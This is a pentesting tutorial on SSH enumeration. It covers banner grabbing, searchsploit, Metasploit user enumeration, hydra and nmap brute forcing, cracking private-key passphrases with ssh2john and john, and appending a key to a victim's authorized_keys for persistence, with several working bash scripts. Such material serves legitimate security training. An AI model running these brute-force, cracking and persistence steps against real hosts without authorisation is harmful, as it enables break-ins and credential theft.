SSH Enumeration
What Does SSH Stand For?
Secure Shell (SSH) is a service that lets us access machines remotely in a secure way. The connection is encrypted and integrity-protected with strong cryptographic algorithms, and the server's host key lets the client detect a man-in-the-middle, provided the host key is actually verified: the "REMOTE HOST IDENTIFICATION HAS CHANGED" warning is that check failing, and blindly accepting an unknown or changed key defeats it. In a company, whenever a network administrator wants to access one of their machines, SSH is usually the first choice (for example via PuTTY from a Windows workstation).
SSH provides both password and public-key based authentication, and is used for:
Secure access to remote devices.
Secure file transfer (scp, sftp).
Running commands on remote devices securely.
Managing network devices and servers securely; it is used extensively in data centres.
You can identify open ports and the SSH version with nmap.
nmap -sCV <IP> // -sV grabs the version banner; -sC runs the default NSE scripts, which for SSH include ssh-hostkey (prints the host key fingerprints).
searchsploit openssh // Searches the local Exploit-DB copy for public exploits; narrow it with the version from the banner, e.g. searchsploit "OpenSSH 7.4".
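The banner that -sV reports can also be grabbed by hand, since sshd sends its version string before any key exchange or authentication. The script below is an added example, not code from the original page: it reads the banner over a raw TCP connection, pulls out the software version, and turns it into a searchsploit query. The target 192.168.1.16 and the sample banners are assumptions; the parsing functions run offline on constructed strings.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): grab the SSH banner, extract the
# version, and build a searchsploit query from it.  Target IP is an assumption.

# Read the first line the server sends.  The SSH identification string is sent
# before key exchange (RFC 4253 section 4.2), so no credentials are needed.
# Uses bash's /dev/tcp pseudo-device, so this function is bash-only.
grab_ssh_banner() {
    host=$1
    port=${2:-22}
    exec 3<>"/dev/tcp/$host/$port" || return 1
    IFS= read -r -t 5 banner <&3
    exec 3<&- 3>&-
    printf '%s\n' "${banner%$'\r'}"   # strip the trailing CR from "SSH-2.0-...\r\n"
}

# Extract "Software_Version" (e.g. OpenSSH_7.4p1) from a banner such as
# "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7".  Returns 1 if the line is not an
# SSH identification string (e.g. a different service is listening on 22).
parse_ssh_version() {
    banner=$1
    case $banner in
        SSH-[12].*-*) ;;
        *) return 1 ;;
    esac
    rest=${banner#SSH-*-}          # drop "SSH-<protoversion>-"
    printf '%s\n' "${rest%% *}"    # drop the optional comment after the first space
}

# Turn "OpenSSH_7.4p1" into "OpenSSH 7.4": searchsploit matches on words, and
# the "p1" portable-release suffix is not part of the Exploit-DB titles.
searchsploit_term() {
    printf '%s\n' "$1" | tr '_' ' ' | sed -E 's/p[0-9]+$//'
}

# Full recon flow: banner -> version -> searchsploit.  Called manually, e.g.
#   ssh_recon 192.168.1.16 22
ssh_recon() {
    b=$(grab_ssh_banner "$1" "${2:-22}") || { echo "no banner from $1" >&2; return 1; }
    v=$(parse_ssh_version "$b") || { echo "not an SSH banner: $b" >&2; return 1; }
    echo "banner:  $b"
    echo "version: $v"
    searchsploit "$(searchsploit_term "$v")"
}
```

Source the file and run `ssh_recon <IP>`; the banner is also worth recording on its own, because the distribution suffix (Debian-10+deb9u7 above) tells you which backported patches the server may carry even when the upstream version number looks old.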
Connect to a Remote Machine Using SSH
You can connect to a remote machine by giving a username and hostname in the format below. The connection succeeds only when the correct password (or an authorized key) is supplied.
ssh <username>@<hostname>
You can also give the remote IP directly; without a username, ssh uses your current local username. You will get "Connection refused" if the SSH service is not listening on port 22 (add -p <port> for a non-standard port).
ssh 192.168.1.16
User Enumeration Via Metasploit
The Metasploit Framework is preinstalled on Kali Linux. You can start it with the command below, search for the SSH modules, set their options and run them:
msfconsole -q
search ssh_enumusers
use auxiliary/scanner/ssh/ssh_enumusers // username enumeration
use auxiliary/scanner/ssh/ssh_login // password brute force against one or many hosts
use auxiliary/scanner/ssh/ssh_login_pubkey // tries a recovered private key against hosts and usernames
show options
set RHOSTS <IP>
set USER_FILE <wordlist>
run
ssh_enumusers works by distinguishing valid from invalid usernames through the server's response to a malformed authentication request (CVE-2018-15473, OpenSSH up to 7.7), so on a patched server it reports nothing useful.
Bruteforce Username or Password
Once the SSH port is open, use a SecLists wordlist to brute force usernames and passwords.
Many NSE scripts are available for SSH. You can display them with the command below.
ls -l /usr/share/nmap/scripts/ | grep ssh // Displays all SSH nmap scripts (NSE).
Use ssh-brute.nse to brute force the box; it takes userdb and passdb script arguments pointing at the wordlists. Keep the attempt rate low: sshd starts dropping unauthenticated connections once MaxStartups is exceeded, and every failed login lands in auth.log, where fail2ban or similar will ban the source address.
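The wordlist side matters as much as the tool: SecLists files sometimes carry CRLF line endings, comment lines and duplicates, and a stray carriage return makes every password in the list wrong. The script below is an added example, not code from the original page. It cleans a wordlist and then wraps hydra and nmap ssh-brute with the conservative settings sshd's MaxStartups calls for. The SecLists paths, the target 192.168.1.16 and the sample list in the comments are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original page).  Normalises a SecLists wordlist
# and runs an SSH brute force with hydra or nmap ssh-brute.  Paths and the
# target address are assumptions for illustration.

# prep_wordlist FILE [MAXLEN]
# Strips CR, blank lines and '#' comments, drops entries longer than MAXLEN
# (default 64) and removes duplicates while keeping the original order.
prep_wordlist() {
    tr -d '\r' < "$1" | grep -v -e '^#' -e '^$' |
        awk -v max="${2:-64}" 'length($0) <= max && !seen[$0]++'
}

# ssh_brute_hydra TARGET USERFILE PASSFILE
#  -t 4 : hydra's own recommendation for ssh; sshd's MaxStartups (default
#         10:30:100) starts refusing unauthenticated connections beyond 10.
#  -f   : stop after the first valid pair.    -o : keep the hits in a file.
ssh_brute_hydra() {
    hydra -L "$2" -P "$3" -t 4 -f -o hydra-ssh.txt "ssh://$1"
}

# ssh_brute_nmap TARGET USERFILE PASSFILE
# Same job with the NSE script; brute.firstonly stops at the first hit.
ssh_brute_nmap() {
    nmap -p 22 --script ssh-brute \
        --script-args "userdb=$2,passdb=$3,brute.firstonly=true" "$1"
}

# Typical flow (assumed SecLists locations from the Kali package):
#   USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
#   PASSES=/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
#   prep_wordlist "$USERS"     > users.txt
#   prep_wordlist "$PASSES" 32 > passes.txt
#   ssh_brute_hydra 192.168.1.16 users.txt passes.txt
```

If a username is already known (from ssh_enumusers, a web app or a leaked config), swap `-L users.txt` for `-l <user>`; every avoided guess is one fewer line in the target's auth.log.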
While pentesting a box or an application, we often see port 22 open. The first things that should strike us are:
If we find an id_rsa.pub: a public key that can be placed in authorized_keys to allow login.
If we find an id_rsa: a private key that can be used to log in (restrict it with chmod 600 first, or ssh refuses to use it).
If the key asks for a passphrase, use ssh2john to convert it to a hash and john to crack it.
ssh -i id_rsa user@192.168.1.18
For passwordless login, add id_rsa.pub to the victim's ~/.ssh/authorized_keys (ssh-copy-id does this for you when you already have a password).
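The steps above, chained into one script, as an added example that is not part of the original page. It decides whether a recovered id_rsa is passphrase-protected (PEM keys announce it in a header line, keys in the newer OpenSSH format do not, so ssh-keygen is asked instead), cracks it with ssh2john and john if needed, logs in with it, and installs a public key for persistence. The target user@192.168.1.18, the Kali path of ssh2john.py and the rockyou wordlist are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): handle a recovered private key
# end to end.  Target, ssh2john path and wordlist are assumptions.

# key_is_encrypted KEYFILE -> exit 0 if a passphrase is needed, 1 otherwise.
# PEM ("BEGIN RSA PRIVATE KEY") keys carry "Proc-Type: 4,ENCRYPTED" when
# protected.  The newer "BEGIN OPENSSH PRIVATE KEY" format has no such header,
# so we try to derive the public key with an empty passphrase instead.
key_is_encrypted() {
    if grep -q 'Proc-Type: 4,ENCRYPTED' "$1"; then
        return 0
    fi
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1" && command -v ssh-keygen >/dev/null; then
        ssh-keygen -y -P '' -f "$1" >/dev/null 2>&1 && return 1 || return 0
    fi
    return 1
}

# crack_key_passphrase KEYFILE [WORDLIST]
# ssh2john turns the key into a john hash; john --show prints the result.
crack_key_passphrase() {
    wl=${2:-/usr/share/wordlists/rockyou.txt}
    python3 /usr/share/john/ssh2john.py "$1" > "$1.hash"
    john --wordlist="$wl" "$1.hash"
    john --show "$1.hash"
}

# ssh_with_key KEYFILE USER HOST
# ssh refuses group/world-readable keys ("UNPROTECTED PRIVATE KEY FILE!"),
# so fix the mode first.  IdentitiesOnly keeps agent keys out of the attempt,
# which otherwise can exhaust the server's MaxAuthTries before this key is tried.
ssh_with_key() {
    chmod 600 "$1"
    ssh -i "$1" -o IdentitiesOnly=yes "$2@$3"
}

# install_pubkey PUBFILE USER HOST
# Appends a public key to the victim's authorized_keys over an existing login
# (password or key).  Equivalent to ssh-copy-id, shown here to make the
# mkdir/umask/append steps explicit.
install_pubkey() {
    ssh "$2@$3" 'umask 077; mkdir -p ~/.ssh; cat >> ~/.ssh/authorized_keys' < "$1"
}

# Usage flow, run by hand after sourcing this file:
#   if key_is_encrypted ./id_rsa; then crack_key_passphrase ./id_rsa; fi
#   ssh_with_key ./id_rsa user 192.168.1.18
#   ssh-keygen -t ed25519 -f ./persist -N '' && install_pubkey ./persist.pub user 192.168.1.18
```

If john reports the passphrase, ssh will still prompt for it on every connection; `ssh-keygen -p -f id_rsa` with an empty new passphrase strips it once the key is yours to use.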